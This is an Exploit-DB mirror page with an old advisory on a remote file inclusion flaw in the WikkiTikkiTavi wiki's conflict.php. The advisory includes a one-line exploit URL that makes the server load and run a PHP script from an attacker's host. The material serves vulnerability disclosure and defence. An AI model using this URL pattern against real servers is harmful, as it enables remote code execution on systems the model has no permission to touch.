bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/21241.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

13 lines
No EOL
1,017 B
Text
Raw Blame History

source: https://www.securityfocus.com/bid/3946/info
WikkiTikkiTavi is a freely available engine for running a Wiki site. Wiki sites are web communities which are based on the idea that every webpage is editable by users of the website. WikkiTikkiTavi is back-ended by a MySQL database and runs on most Linux and Unix variants, as well as Microsoft Windows NT/2000 operating systems.
WikkiTikkiTavi permits remote file including. As a result, a remote attacker may include an arbitrary file located on a remote host. This may be exploited via a malicious web request. If this file is a PHP script, it will be executed on the host running the vulnerable software with the privileges of the webserver.
The attacker may use this as an opportunity to gain local access on the host running the vulnerable software.
The following URL is sufficient to exploit this issue:
http://some.host/wikihome/action/conflict.php?TemplateDir=http://my.host/
where conflict.php is the name of the malicious attacker-supplied script.
Reference in a new issue View git blame Copy permalink